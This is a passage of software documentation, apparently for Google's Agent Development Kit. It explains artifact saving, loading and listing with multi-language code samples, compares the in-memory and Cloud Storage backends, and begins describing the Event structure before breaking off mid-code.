```go import ( "context" "log" "google.golang.org/adk/agent/llmagent" "google.golang.org/adk/artifactservice" "google.golang.org/adk/llm/gemini" "google.golang.org/adk/runner" "google.golang.org/adk/sessionservice" "google.golang.org/genai" ) // Create a new context. ctx := context.Background() // Set the app name. const appName = "my_artifact_app" // Create a new Gemini model. model, err := gemini.NewModel(ctx, "gemini-2.5-flash", &genai.ClientConfig{}) if err != nil { log.Fatalf("Failed to create model: %v", err) } // Create a new LLM agent. myAgent, err := llmagent.New(llmagent.Config{ Model: model, Name: "artifact_user_agent", Instruction: "You are an agent that describes images.", BeforeModelCallbacks: []llmagent.BeforeModelCallback{ BeforeModelCallback, }, }) if err != nil { log.Fatalf("Failed to create agent: %v", err) } // Create a new in-memory artifact service. artifactService := artifact.InMemoryService() // Create a new in-memory session service. sessionService := session.InMemoryService() // Create a new runner. r, err := runner.New(runner.Config{ Agent: myAgent, AppName: appName, SessionService: sessionService, ArtifactService: artifactService, // Provide the service instance here }) if err != nil { log.Fatalf("Failed to create runner: %v", err) } log.Printf("Runner created successfully: %v", r) ``` In Java, you would instantiate a `BaseArtifactService` implementation and then ensure it's accessible to the parts of your application that manage artifacts. This is often done through dependency injection or by explicitly passing the service instance. 
```java
import com.google.adk.agents.LlmAgent;
import com.google.adk.artifacts.InMemoryArtifactService; // Or GcsArtifactService
import com.google.adk.runner.Runner;
import com.google.adk.sessions.InMemorySessionService;

public class SampleArtifactAgent {

  public static void main(String[] args) {
    // Your agent definition
    LlmAgent agent = LlmAgent.builder()
        .name("my_agent")
        .model("gemini-2.0-flash")
        .build();

    // Instantiate the desired artifact service
    InMemoryArtifactService artifactService = new InMemoryArtifactService();

    // Provide it to the Runner
    Runner runner = new Runner(agent,
        "APP_NAME",
        artifactService, // Service must be provided here
        new InMemorySessionService());
  }
}
```

### Accessing Methods

The artifact interaction methods are available directly on instances of `CallbackContext` (passed to agent and model callbacks) and `ToolContext` (passed to tool functions and tool callbacks). Remember that `ToolContext` inherits from `CallbackContext`.

#### Saving Artifacts

- **Code Example:**

```python
import google.genai.types as types
from google.adk.agents.callback_context import CallbackContext # Or ToolContext

async def save_generated_report_py(context: CallbackContext, report_bytes: bytes):
    """Saves generated PDF report bytes as an artifact."""
    report_artifact = types.Part.from_bytes(
        data=report_bytes,
        mime_type="application/pdf"
    )
    filename = "generated_report.pdf"

    try:
        version = await context.save_artifact(filename=filename, artifact=report_artifact)
        print(f"Successfully saved Python artifact '{filename}' as version {version}.")
        # The event generated after this callback will contain:
        # event.actions.artifact_delta == {"generated_report.pdf": version}
    except ValueError as e:
        print(f"Error saving Python artifact: {e}. Is ArtifactService configured in Runner?")
    except Exception as e:
        # Handle potential storage errors (e.g., GCS permissions)
        print(f"An unexpected error occurred during Python artifact save: {e}")

# --- Example Usage Concept (Python) ---
# async def main_py():
#   callback_context: CallbackContext = ... # obtain context
#   report_data = b'...' # Assume this holds the PDF bytes
#   await save_generated_report_py(callback_context, report_data)
```

```typescript
import type { Part } from '@google/genai';
import { createPartFromBase64 } from '@google/genai';
import { CallbackContext } from '@google/adk';

async function saveGeneratedReport(context: CallbackContext, reportBytes: Uint8Array): Promise<void> {
    /**Saves generated PDF report bytes as an artifact.*/
    // Uint8Array.toString() ignores an encoding argument, so encode via Buffer (Node.js).
    const reportArtifact: Part = createPartFromBase64(Buffer.from(reportBytes).toString('base64'), "application/pdf");

    const filename = "generated_report.pdf";

    try {
        const version = await context.saveArtifact(filename, reportArtifact);
        console.log(`Successfully saved TypeScript artifact '${filename}' as version ${version}.`);
    } catch (e: any) {
        console.error(`Error saving TypeScript artifact: ${e.message}. Is ArtifactService configured in Runner?`);
    }
}
```

```go
import (
	"log"

	"google.golang.org/adk/agent"
	"google.golang.org/adk/model" // Provides the model.LLMRequest / model.LLMResponse types used below
	"google.golang.org/genai"
)

// saveReportCallback is a BeforeModel callback that saves a report from session state.
func saveReportCallback(ctx agent.CallbackContext, req *model.LLMRequest) (*model.LLMResponse, error) {
	// Get the report data from the session state.
	reportData, err := ctx.State().Get("report_bytes")
	if err != nil {
		log.Printf("No report data found in session state: %v", err)
		return nil, nil // No report to save, continue normally.
	}

	// Check if the report data is in the expected format.
	reportBytes, ok := reportData.([]byte)
	if !ok {
		log.Printf("Report data in session state was not in the expected byte format.")
		return nil, nil
	}

	// Create a new artifact with the report data.
	reportArtifact := &genai.Part{
		InlineData: &genai.Blob{
			MIMEType: "application/pdf",
			Data:     reportBytes,
		},
	}

	// Set the filename for the artifact.
	filename := "generated_report.pdf"

	// Save the artifact to the artifact service.
	_, err = ctx.Artifacts().Save(ctx, filename, reportArtifact)
	if err != nil {
		log.Printf("An unexpected error occurred during Go artifact save: %v", err)
		// Depending on requirements, you might want to return an error to the user.
		return nil, nil
	}

	log.Printf("Successfully saved Go artifact '%s'.", filename)

	// Return nil to continue to the next callback or the model.
	return nil, nil
}
```

```java
import com.google.adk.agents.CallbackContext;
import com.google.adk.artifacts.BaseArtifactService;
import com.google.adk.artifacts.InMemoryArtifactService;
import com.google.genai.types.Part;
import java.nio.charset.StandardCharsets;

public class SaveArtifactExample {

  public void saveGeneratedReport(CallbackContext callbackContext, byte[] reportBytes) {
    // Saves generated PDF report bytes as an artifact.
    Part reportArtifact = Part.fromBytes(reportBytes, "application/pdf");
    String filename = "generated_report.pdf";

    callbackContext.saveArtifact(filename, reportArtifact);
    System.out.println("Successfully saved Java artifact '" + filename + "'.");
    // The event generated after this callback will contain:
    // event().actions().artifactDelta == {"generated_report.pdf": version}
  }

  // --- Example Usage Concept (Java) ---
  public static void main(String[] args) {
    BaseArtifactService service = new InMemoryArtifactService(); // Or GcsArtifactService
    SaveArtifactExample myTool = new SaveArtifactExample();
    byte[] reportData = "...".getBytes(StandardCharsets.UTF_8); // PDF bytes
    CallbackContext callbackContext; // ... obtain callback context from your app
    myTool.saveGeneratedReport(callbackContext, reportData);
    // Due to async nature, in a real app, ensure program waits or handles completion.
} } ``` #### Loading Artifacts - **Code Example:** ```python import google.genai.types as types from google.adk.agents.callback_context import CallbackContext # Or ToolContext async def process_latest_report_py(context: CallbackContext): """Loads the latest report artifact and processes its data.""" filename = "generated_report.pdf" try: # Load the latest version report_artifact = await context.load_artifact(filename=filename) if report_artifact and report_artifact.inline_data: print(f"Successfully loaded latest Python artifact '{filename}'.") print(f"MIME Type: {report_artifact.inline_data.mime_type}") # Process the report_artifact.inline_data.data (bytes) pdf_bytes = report_artifact.inline_data.data print(f"Report size: {len(pdf_bytes)} bytes.") # ... further processing ... else: print(f"Python artifact '{filename}' not found.") # Example: Load a specific version (if version 0 exists) # specific_version_artifact = await context.load_artifact(filename=filename, version=0) # if specific_version_artifact: # print(f"Loaded version 0 of '{filename}'.") except ValueError as e: print(f"Error loading Python artifact: {e}. Is ArtifactService configured?") except Exception as e: # Handle potential storage errors print(f"An unexpected error occurred during Python artifact load: {e}") # --- Example Usage Concept (Python) --- # async def main_py(): # callback_context: CallbackContext = ... 
# obtain context # await process_latest_report_py(callback_context) ``` ```typescript import { CallbackContext } from '@google/adk'; async function processLatestReport(context: CallbackContext): Promise<void> { /**Loads the latest report artifact and processes its data.*/ const filename = "generated_report.pdf"; try { // Load the latest version const reportArtifact = await context.loadArtifact(filename); if (reportArtifact?.inlineData) { console.log(`Successfully loaded latest TypeScript artifact '${filename}'.`); console.log(`MIME Type: ${reportArtifact.inlineData.mimeType}`); // Process the reportArtifact.inlineData.data (base64 string) const pdfData = Buffer.from(reportArtifact.inlineData.data, 'base64'); console.log(`Report size: ${pdfData.length} bytes.`); // ... further processing ... } else { console.log(`TypeScript artifact '${filename}' not found.`); } } catch (e: any) { console.error(`Error loading TypeScript artifact: ${e.message}. Is ArtifactService configured?`); } } ``` ```go import ( "log" "google.golang.org/adk/agent" "google.golang.org/adk/model" "google.golang.org/genai" ) // loadArtifactsCallback is a BeforeModel callback that loads a specific artifact // and adds its content to the LLM request. func loadArtifactsCallback(ctx agent.CallbackContext, req *model.LLMRequest) (*model.LLMResponse, error) { log.Println("[Callback] loadArtifactsCallback triggered.") // In a real app, you would parse the user's request to find a filename. // For this example, we'll hardcode a filename to demonstrate. const filenameToLoad = "generated_report.pdf" // Load the artifact from the artifact service. loadedPartResponse, err := ctx.Artifacts().Load(ctx, filenameToLoad) if err != nil { log.Printf("Callback could not load artifact '%s': %v", filenameToLoad, err) return nil, nil // File not found or error, continue to model. 
} loadedPart := loadedPartResponse.Part log.Printf("Callback successfully loaded artifact '%s'.", filenameToLoad) // Ensure there's at least one content in the request to append to. if len(req.Contents) == 0 { req.Contents = []*genai.Content{{Parts: []*genai.Part{ genai.NewPartFromText("SYSTEM: The following file is provided for context:\n"), }}} } // Add the loaded artifact to the request for the model. lastContent := req.Contents[len(req.Contents)-1] lastContent.Parts = append(lastContent.Parts, loadedPart) log.Printf("Added artifact '%s' to LLM request.", filenameToLoad) // Return nil to continue to the next callback or the model. return nil, nil // Continue to next callback or LLM call } ``` ```java import com.google.adk.artifacts.BaseArtifactService; import com.google.genai.types.Part; import io.reactivex.rxjava3.core.MaybeObserver; import io.reactivex.rxjava3.disposables.Disposable; import java.util.Optional; public class MyArtifactLoaderService { private final BaseArtifactService artifactService; private final String appName; public MyArtifactLoaderService(BaseArtifactService artifactService, String appName) { this.artifactService = artifactService; this.appName = appName; } public void processLatestReportJava(String userId, String sessionId, String filename) { // Load the latest version by passing Optional.empty() for the version artifactService .loadArtifact(appName, userId, sessionId, filename, Optional.empty()) .subscribe( new MaybeObserver<Part>() { @Override public void onSubscribe(Disposable d) { // Optional: handle subscription } @Override public void onSuccess(Part reportArtifact) { System.out.println( "Successfully loaded latest Java artifact '" + filename + "'."); reportArtifact .inlineData() .ifPresent( blob -> { System.out.println( "MIME Type: " + blob.mimeType().orElse("N/A")); byte[] pdfBytes = blob.data().orElse(new byte[0]); System.out.println("Report size: " + pdfBytes.length + " bytes."); // ... further processing of pdfBytes ... 
}); } @Override public void onError(Throwable e) { // Handle potential storage errors or other exceptions System.err.println( "An error occurred during Java artifact load for '" + filename + "': " + e.getMessage()); } @Override public void onComplete() { // Called if the artifact (latest version) is not found System.out.println("Java artifact '" + filename + "' not found."); } }); // Example: Load a specific version (e.g., version 0) /* artifactService.loadArtifact(appName, userId, sessionId, filename, Optional.of(0)) .subscribe(part -> { System.out.println("Loaded version 0 of Java artifact '" + filename + "'."); }, throwable -> { System.err.println("Error loading version 0 of '" + filename + "': " + throwable.getMessage()); }, () -> { System.out.println("Version 0 of Java artifact '" + filename + "' not found."); }); */ } // --- Example Usage Concept (Java) --- public static void main(String[] args) { // BaseArtifactService service = new InMemoryArtifactService(); // Or GcsArtifactService // MyArtifactLoaderService loader = new MyArtifactLoaderService(service, "myJavaApp"); // loader.processLatestReportJava("user123", "sessionABC", "java_report.pdf"); // Due to async nature, in a real app, ensure program waits or handles completion. } } ``` #### Listing Artifact Filenames - **Code Example:** ```python from google.adk.tools.tool_context import ToolContext async def list_user_files_py(tool_context: ToolContext) -> str: """Tool to list available artifacts for the user.""" try: available_files = await tool_context.list_artifacts() if not available_files: return "You have no saved artifacts." else: # Format the list for the user/LLM file_list_str = "\n".join([f"- {fname}" for fname in available_files]) return f"Here are your available Python artifacts:\n{file_list_str}" except ValueError as e: print(f"Error listing Python artifacts: {e}. Is ArtifactService configured?") return "Error: Could not list Python artifacts." 
except Exception as e: print(f"An unexpected error occurred during Python artifact list: {e}") return "Error: An unexpected error occurred while listing Python artifacts." # This function would typically be wrapped in a FunctionTool # from google.adk.tools import FunctionTool # list_files_tool = FunctionTool(func=list_user_files_py) ``` ```typescript import { ToolContext } from '@google/adk'; async function listUserFiles(toolContext: ToolContext): Promise<string> { /**Tool to list available artifacts for the user.*/ try { const availableFiles = await toolContext.listArtifacts(); if (!availableFiles || availableFiles.length === 0) { return "You have no saved artifacts."; } else { // Format the list for the user/LLM const fileListStr = availableFiles.map(fname => `- ${fname}`).join("\n"); return `Here are your available TypeScript artifacts:\n${fileListStr}`; } } catch (e: any) { console.error(`Error listing TypeScript artifacts: ${e.message}. Is ArtifactService configured?`); return "Error: Could not list TypeScript artifacts."; } } ``` ```go import ( "fmt" "log" "strings" "google.golang.org/adk/agent" "google.golang.org/adk/model" "google.golang.org/genai" ) // listUserFilesCallback is a BeforeModel callback that lists available artifacts // and adds the list as context to the LLM request. func listUserFilesCallback(ctx agent.CallbackContext, req *model.LLMRequest) (*model.LLMResponse, error) { log.Println("[Callback] listUserFilesCallback triggered.") // List the available artifacts from the artifact service. listResponse, err := ctx.Artifacts().List(ctx) if err != nil { log.Printf("An unexpected error occurred during Go artifact list: %v", err) return nil, nil // Continue, but log the error. } availableFiles := listResponse.FileNames log.Printf("Found %d available files.", len(availableFiles)) // If there are available files, add them to the LLM request. 
if len(availableFiles) > 0 { var fileListStr strings.Builder fileListStr.WriteString("SYSTEM: The following files are available:\n") for _, fname := range availableFiles { fileListStr.WriteString(fmt.Sprintf("- %s\n", fname)) } // Prepend this information to the user's request for the model. if len(req.Contents) > 0 { lastContent := req.Contents[len(req.Contents)-1] if len(lastContent.Parts) > 0 { fileListStr.WriteString("\n") // Add a newline for separation. lastContent.Parts[0] = genai.NewPartFromText(fileListStr.String() + lastContent.Parts[0].Text) log.Println("Added file list to LLM request context.") } } log.Printf("Available files:\n%s", fileListStr.String()) } else { log.Println("No available files found to list.") } // Return nil to continue to the next callback or the model. return nil, nil // Continue to next callback or LLM call } ``` ```java import com.google.adk.artifacts.BaseArtifactService; import com.google.adk.artifacts.ListArtifactsResponse; import com.google.common.collect.ImmutableList; import io.reactivex.rxjava3.core.SingleObserver; import io.reactivex.rxjava3.disposables.Disposable; public class MyArtifactListerService { private final BaseArtifactService artifactService; private final String appName; public MyArtifactListerService(BaseArtifactService artifactService, String appName) { this.artifactService = artifactService; this.appName = appName; } // Example method that might be called by a tool or agent logic public void listUserFilesJava(String userId, String sessionId) { artifactService .listArtifactKeys(appName, userId, sessionId) .subscribe( new SingleObserver<ListArtifactsResponse>() { @Override public void onSubscribe(Disposable d) { // Optional: handle subscription } @Override public void onSuccess(ListArtifactsResponse response) { ImmutableList<String> availableFiles = response.filenames(); if (availableFiles.isEmpty()) { System.out.println( "User " + userId + " in session " + sessionId + " has no saved Java artifacts."); } else { StringBuilder fileListStr = 
new StringBuilder( "Here are the available Java artifacts for user " + userId + " in session " + sessionId + ":\n"); for (String fname : availableFiles) { fileListStr.append("- ").append(fname).append("\n"); } System.out.println(fileListStr.toString()); } } @Override public void onError(Throwable e) { System.err.println( "Error listing Java artifacts for user " + userId + " in session " + sessionId + ": " + e.getMessage()); // In a real application, you might return an error message to the user/LLM } }); } // --- Example Usage Concept (Java) --- public static void main(String[] args) { // BaseArtifactService service = new InMemoryArtifactService(); // Or GcsArtifactService // MyArtifactListerService lister = new MyArtifactListerService(service, "myJavaApp"); // lister.listUserFilesJava("user123", "sessionABC"); // Due to async nature, in a real app, ensure program waits or handles completion. } } ``` These methods for saving, loading, and listing provide a convenient and consistent way to manage binary data persistence within ADK, whether using Python's context objects or directly interacting with the `BaseArtifactService` in Java, regardless of the chosen backend storage implementation. ## Available Implementations ADK provides concrete implementations of the `BaseArtifactService` interface, offering different storage backends suitable for various development stages and deployment needs. These implementations handle the details of storing, versioning, and retrieving artifact data based on the `app_name`, `user_id`, `session_id`, and `filename` (including the `user:` namespace prefix). ### InMemoryArtifactService - **Storage Mechanism:** - Python: Uses a Python dictionary (`self.artifacts`) held in the application's memory. The dictionary keys represent the artifact path, and the values are lists of `types.Part`, where each list element is a version. - Java: Uses nested `HashMap` instances (`private final Map<String, Map<String, Map<String, Map<String, List<Part>>>>> artifacts;`) held in memory. 
The keys at each level are `appName`, `userId`, `sessionId`, and `filename` respectively. The innermost `List` stores the versions of the artifact, where the list index corresponds to the version number. - **Key Features:** - **Simplicity:** Requires no external setup or dependencies beyond the core ADK library. - **Speed:** Operations are typically very fast as they involve in-memory map/dictionary lookups and list manipulations. - **Ephemeral:** All stored artifacts are **lost** when the application process terminates. Data does not persist between application restarts. - **Use Cases:** - Ideal for local development and testing where persistence is not required. - Suitable for short-lived demonstrations or scenarios where artifact data is purely temporary within a single run of the application. - **Instantiation:** ```python from google.adk.artifacts import InMemoryArtifactService # Simply instantiate the class in_memory_service_py = InMemoryArtifactService() # Then pass it to the Runner # runner = Runner(..., artifact_service=in_memory_service_py) ``` ```typescript import { InMemoryArtifactService } from '@google/adk'; // Simply instantiate the class const inMemoryService = new InMemoryArtifactService(); // This instance would then be provided to your Runner. 
// const runner = new InMemoryRunner({ // /* other services */, // artifactService: inMemoryService // }); ``` ```go import ( "log" "google.golang.org/adk/artifact" ) // Simply instantiate the service artifactService := artifact.InMemoryService() log.Printf("InMemoryArtifactService (Go) instantiated: %T", artifactService) // Use the service in your runner // r, _ := runner.New(runner.Config{ // Agent: agent, // AppName: "my_app", // SessionService: sessionService, // ArtifactService: artifactService, // }) ``` ```java import com.google.adk.artifacts.BaseArtifactService; import com.google.adk.artifacts.InMemoryArtifactService; public class InMemoryServiceSetup { public static void main(String[] args) { // Simply instantiate the class BaseArtifactService inMemoryServiceJava = new InMemoryArtifactService(); System.out.println("InMemoryArtifactService (Java) instantiated: " + inMemoryServiceJava.getClass().getName()); // This instance would then be provided to your Runner. // Runner runner = new Runner( // /* other services */, // inMemoryServiceJava // ); } } ``` ### GcsArtifactService - **Storage Mechanism:** Leverages Google Cloud Storage (GCS) for persistent artifact storage. Each version of an artifact is stored as a separate object (blob) within a specified GCS bucket. - **Object Naming Convention:** It constructs GCS object names (blob names) using a hierarchical path structure. - **Key Features:** - **Persistence:** Artifacts stored in GCS persist across application restarts and deployments. - **Scalability:** Leverages the scalability and durability of Google Cloud Storage. - **Versioning:** Each version is stored explicitly as a distinct GCS object by the `saveArtifact` method in `GcsArtifactService`. - **Permissions Required:** The application environment needs appropriate credentials (e.g., Application Default Credentials) and IAM permissions to read from and write to the specified GCS bucket. 
- **Use Cases:** - Production environments requiring persistent artifact storage. - Scenarios where artifacts need to be shared across different application instances or services (by accessing the same GCS bucket). - Applications needing long-term storage and retrieval of user or session data. - **Instantiation:** ```python from google.adk.artifacts import GcsArtifactService # Specify the GCS bucket name gcs_bucket_name_py = "your-gcs-bucket-for-adk-artifacts" # Replace with your bucket name try: gcs_service_py = GcsArtifactService(bucket_name=gcs_bucket_name_py) print(f"Python GcsArtifactService initialized for bucket: {gcs_bucket_name_py}") # Ensure your environment has credentials to access this bucket. # e.g., via Application Default Credentials (ADC) # Then pass it to the Runner # runner = Runner(..., artifact_service=gcs_service_py) except Exception as e: # Catch potential errors during GCS client initialization (e.g., auth issues) print(f"Error initializing Python GcsArtifactService: {e}") # Handle the error appropriately - maybe fall back to InMemory or raise ``` ```java import com.google.adk.artifacts.BaseArtifactService; import com.google.adk.artifacts.GcsArtifactService; import com.google.cloud.storage.Storage; import com.google.cloud.storage.StorageOptions; public class GcsServiceSetup { public static void main(String[] args) { // Specify the GCS bucket name String gcsBucketNameJava = "your-gcs-bucket-for-adk-artifacts"; // Replace with your bucket name try { // Initialize the GCS Storage client. // This will use Application Default Credentials by default. // Ensure the environment is configured correctly (e.g., GOOGLE_APPLICATION_CREDENTIALS). 
Storage storageClient = StorageOptions.getDefaultInstance().getService(); // Instantiate the GcsArtifactService BaseArtifactService gcsServiceJava = new GcsArtifactService(gcsBucketNameJava, storageClient); System.out.println( "Java GcsArtifactService initialized for bucket: " + gcsBucketNameJava); // This instance would then be provided to your Runner. // Runner runner = new Runner( // /* other services */, // gcsServiceJava // ); } catch (Exception e) { // Catch potential errors during GCS client initialization (e.g., auth, permissions) System.err.println("Error initializing Java GcsArtifactService: " + e.getMessage()); e.printStackTrace(); // Handle the error appropriately } } } ``` Choosing the appropriate `ArtifactService` implementation depends on your application's requirements for data persistence, scalability, and operational environment. ## Best Practices To use artifacts effectively and maintainably: - **Choose the Right Service:** Use `InMemoryArtifactService` for rapid prototyping, testing, and scenarios where persistence isn't needed. Use `GcsArtifactService` (or implement your own `BaseArtifactService` for other backends) for production environments requiring data persistence and scalability. - **Meaningful Filenames:** Use clear, descriptive filenames. Including relevant extensions (`.pdf`, `.png`, `.wav`) helps humans understand the content, even though the `mime_type` dictates programmatic handling. Establish conventions for temporary vs. persistent artifact names. - **Specify Correct MIME Types:** Always provide an accurate `mime_type` when creating the `types.Part` for `save_artifact`. This is critical for applications or tools that later `load_artifact` to interpret the `bytes` data correctly. Use standard IANA MIME types where possible. - **Understand Versioning:** Remember that `load_artifact()` without a specific `version` argument retrieves the *latest* version. 
If your logic depends on a specific historical version of an artifact, be sure to provide the integer version number when loading. - **Use Namespacing (`user:`) Deliberately:** Only use the `"user:"` prefix for filenames when the data truly belongs to the user and should be accessible across all their sessions. For data specific to a single conversation or session, use regular filenames without the prefix. - **Error Handling:** - Always check if an `artifact_service` is actually configured before calling context methods (`save_artifact`, `load_artifact`, `list_artifacts`) – they will raise a `ValueError` if the service is `None`. - Check the return value of `load_artifact`, as it will be `None` if the artifact or version doesn't exist. Don't assume it always returns a `Part`. - Be prepared to handle exceptions from the underlying storage service, especially with `GcsArtifactService` (e.g., `google.api_core.exceptions.Forbidden` for permission issues, `NotFound` if the bucket doesn't exist, network errors). - **Size Considerations:** Artifacts are suitable for typical file sizes, but be mindful of potential costs and performance impacts with extremely large files, especially with cloud storage. `InMemoryArtifactService` can consume significant memory if storing many large artifacts. Evaluate if very large data might be better handled through direct GCS links or other specialized storage solutions rather than passing entire byte arrays in-memory. - **Cleanup Strategy:** For persistent storage like `GcsArtifactService`, artifacts remain until explicitly deleted. If artifacts represent temporary data or have a limited lifespan, implement a strategy for cleanup. This might involve: - Using GCS lifecycle policies on the bucket. - Building specific tools or administrative functions that utilize the `artifact_service.delete_artifact` method (note: delete is *not* exposed via context objects for safety). 
- Carefully managing filenames to allow pattern-based deletion if needed. # Events Supported in ADK: Python v0.1.0, TypeScript v0.2.0, Go v0.1.0, Java v0.1.0 Events are the fundamental units of information flow within the Agent Development Kit (ADK). They represent every significant occurrence during an agent's interaction lifecycle, from initial user input to the final response and all the steps in between. Understanding events is crucial because they are the primary way components communicate, state is managed, and control flow is directed. ## What Events Are and Why They Matter An `Event` in ADK is an immutable record representing a specific point in the agent's execution. It captures user messages, agent replies, requests to use tools (function calls), tool results, state changes, control signals, and errors. Technically, it's an instance of the `google.adk.events.Event` class, which builds upon the basic `LlmResponse` structure by adding essential ADK-specific metadata and an `actions` payload. ```python # Conceptual Structure of an Event (Python) # from google.adk.events import Event, EventActions # from google.genai import types # class Event(LlmResponse): # Simplified view # # --- LlmResponse fields --- # content: Optional[types.Content] # partial: Optional[bool] # # ... other response fields ... # # --- ADK specific additions --- # author: str # 'user' or agent name # invocation_id: str # ID for the whole interaction run # id: str # Unique ID for this specific event # timestamp: float # Creation time # actions: EventActions # Important for side-effects & control # branch: Optional[str] # Hierarchy path # # ... ``` In Go, this is a struct of type `google.golang.org/adk/session.Event`. 
```go // Conceptual Structure of an Event (Go - See session/session.go) // Simplified view based on the session.Event struct type Event struct { // --- Fields from embedded model.LLMResponse --- model.LLMResponse // --- ADK specific additions --- Author string // 'user' or agent name InvocationID string // ID for the whole interaction run ID string // Unique ID for this specific event Timestamp time.Time // Creation time Actions EventActions // Important for side-effects & control Branch string // Hierarchy path // ... other fields } // model.LLMResponse contains the Content field type LLMResponse struct { Content *genai.Content // ... other fields } ``` In Java, this is an instance of the `com.google.adk.events.Event` class. It also builds upon a basic response structure by adding essential ADK-specific metadata and an `actions` payload. ```java // Conceptual Structure of an Event (Java - See com.google.adk.events.Event.java) // Simplified view based on the provided com.google.adk.events.Event.java // public class Event extends JsonBaseModel { // // --- Fields analogous to LlmResponse --- // private Optional<Content> content; // private Optional<Boolean> partial; // // ... other response fields like errorCode, errorMessage ... // // --- ADK specific additions --- // private String author; // 'user' or agent name // private String invocationId; // ID for the whole interaction run // private String id; // Unique ID for this specific event // private long timestamp; // Creation time (epoch milliseconds) // private EventActions actions; // Important for side-effects & control // private Optional<String> branch; // Hierarchy path // // ... other fields like turnComplete, longRunningToolIds etc. // } ``` Events are central to ADK's operation for several key reasons: 1. **Communication:** They serve as the standard message format between the user interface, the `Runner`, agents, the LLM, and tools. Everything flows as an `Event`. 1. 
**Signaling State & Artifact Changes:** Events carry instructions for state modifications and track artifact updates. The `SessionService` uses these signals to ensure persistence. In Python, changes are signaled via `event.actions.state_delta` and `event.actions.artifact_delta`. 1. **Control Flow:** Specific fields like `event.actions.transfer_to_agent` or `event.actions.escalate` act as signals that direct the framework, determining which agent runs next or if a loop should terminate. 1. **History & Observability:** The sequence of events recorded in `session.events` provides a complete, chronological history of an interaction, invaluable for debugging, auditing, and understanding agent behavior step-by-step. In essence, the entire process, from a user's query to the agent's final answer, is orchestrated through the generation, interpretation, and processing of `Event` objects. ## Understanding and Using Events As a developer, you'll primarily interact with the stream of events yielded by the `Runner`. Here's how to understand and extract information from them: Note The specific parameters or method names for the primitives may vary slightly by SDK language (e.g., `event.content` in Python, `event.content().get().parts()` in Java). Refer to the language-specific API documentation for details. ### Identifying Event Origin and Type Quickly determine what an event represents by checking: - **Who sent it? (`event.author`)** - `'user'`: Indicates input directly from the end-user. - `'AgentName'`: Indicates output or action from a specific agent (e.g., `'WeatherAgent'`, `'SummarizerAgent'`). - **What's the main payload? (`event.content` and `event.content.parts`)** - **Text:** Indicates a conversational message. For Python, check if `event.content.parts[0].text` exists. For Java, check if `event.content()` is present, its `parts()` are present and not empty, and the first part's `text()` is present. - **Tool Call Request:** Check `event.get_function_calls()`. 
If not empty, the LLM is asking to execute one or more tools. Each item in the list has `.name` and `.args`. - **Tool Result:** Check `event.get_function_responses()`. If not empty, this event carries the result(s) from tool execution(s). Each item has `.name` and `.response` (the dictionary returned by the tool). *Note:* For history structuring, the `role` inside the `content` is often `'user'`, but the event `author` is typically the agent that requested the tool call. - **Is it streaming output? (`event.partial`)** Indicates whether this is an incomplete chunk of text from the LLM. - `True`: More text will follow. - `False` or `None`/`Optional.empty()`: This part of the content is complete (though the overall turn might not be finished if `turn_complete` is also false). ```python # Pseudocode: Basic event identification (Python) # async for event in runner.run_async(...): # print(f"Event from: {event.author}") # # if event.content and event.content.parts: # if event.get_function_calls(): # print(" Type: Tool Call Request") # elif event.get_function_responses(): # print(" Type: Tool Result") # elif event.content.parts[0].text: # if event.partial: # print(" Type: Streaming Text Chunk") # else: # print(" Type: Complete Text Message") # else: # print(" Type: Other Content (e.g., code result)") # elif event.actions and (event.actions.state_delta or event.actions.artifact_delta): # print(" Type: State/Artifact Update") # else: # print(" Type: Control Signal or Other") ``` ```go // Pseudocode: Basic event identification (Go) import ( "fmt" "google.golang.org/adk/session" "google.golang.org/genai" ) func hasFunctionCalls(content *genai.Content) bool { if content == nil { return false } for _, part := range content.Parts { if part.FunctionCall != nil { return true } } return false } func hasFunctionResponses(content *genai.Content) bool { if content == nil { return false } for _, part := range content.Parts { if part.FunctionResponse != nil { return true } } return false 
} func processEvents(events <-chan *session.Event) { for event := range events { fmt.Printf("Event from: %s\n", event.Author) if event.LLMResponse != nil && event.LLMResponse.Content != nil { if hasFunctionCalls(event.LLMResponse.Content) { fmt.Println(" Type: Tool Call Request") } else if hasFunctionResponses(event.LLMResponse.Content) { fmt.Println(" Type: Tool Result") } else if len(event.LLMResponse.Content.Parts) > 0 { if event.LLMResponse.Content.Parts[0].Text != "" { if event.LLMResponse.Partial { fmt.Println(" Type: Streaming Text Chunk") } else { fmt.Println(" Type: Complete Text Message") } } else { fmt.Println(" Type: Other Content (e.g., code result)") } } } else if len(event.Actions.StateDelta) > 0 { fmt.Println(" Type: State Update") } else { fmt.Println(" Type: Control Signal or Other") } } } ``` ```java // Pseudocode: Basic event identification (Java) // import com.google.genai.types.Content; // import com.google.adk.events.Event; // import com.google.adk.events.EventActions; // runner.runAsync(...).forEach(event -> { // Assuming a synchronous stream or reactive stream // System.out.println("Event from: " + event.author()); // // if (event.content().isPresent()) { // Content content = event.content().get(); // if (!event.functionCalls().isEmpty()) { // System.out.println(" Type: Tool Call Request"); // } else if (!event.functionResponses().isEmpty()) { // System.out.println(" Type: Tool Result"); // } else if (content.parts().isPresent() && !content.parts().get().isEmpty() && // content.parts().get().get(0).text().isPresent()) { // if (event.partial().orElse(false)) { // System.out.println(" Type: Streaming Text Chunk"); // } else { // System.out.println(" Type: Complete Text Message"); // } // } else { // System.out.println(" Type: Other Content (e.g., code result)"); // } // } else if (event.actions() != null && // ((event.actions().stateDelta() != null && !event.actions().stateDelta().isEmpty()) || // (event.actions().artifactDelta() != null && 
!event.actions().artifactDelta().isEmpty()))) { // System.out.println(" Type: State/Artifact Update"); // } else { // System.out.println(" Type: Control Signal or Other"); // } // }); ``` ### Extracting Key Information Once you know the event type, access the relevant data: - **Text Content:** Always check for the presence of content and parts before accessing text. In Python, it's `text = event.content.parts[0].text`. - **Function Call Details:** ```python calls = event.get_function_calls() if calls: for call in calls: tool_name = call.name arguments = call.args # This is usually a dictionary print(f" Tool: {tool_name}, Args: {arguments}") # Application might dispatch execution based on this ``` ```go import ( "fmt" "google.golang.org/adk/session" "google.golang.org/genai" ) func handleFunctionCalls(event *session.Event) { if event.LLMResponse == nil || event.LLMResponse.Content == nil { return } calls := event.Content.FunctionCalls() if len(calls) > 0 { for _, call := range calls { toolName := call.Name arguments := call.Args fmt.Printf(" Tool: %s, Args: %v\n", toolName, arguments) // Application might dispatch execution based on this } } } ``` ```java import com.google.genai.types.FunctionCall; import com.google.common.collect.ImmutableList; import java.util.Map; ImmutableList<FunctionCall> calls = event.functionCalls(); // from Event.java if (!calls.isEmpty()) { for (FunctionCall call : calls) { String toolName = call.name().get(); // args is Optional<Map<String, Object>> Map<String, Object> arguments = call.args().get(); 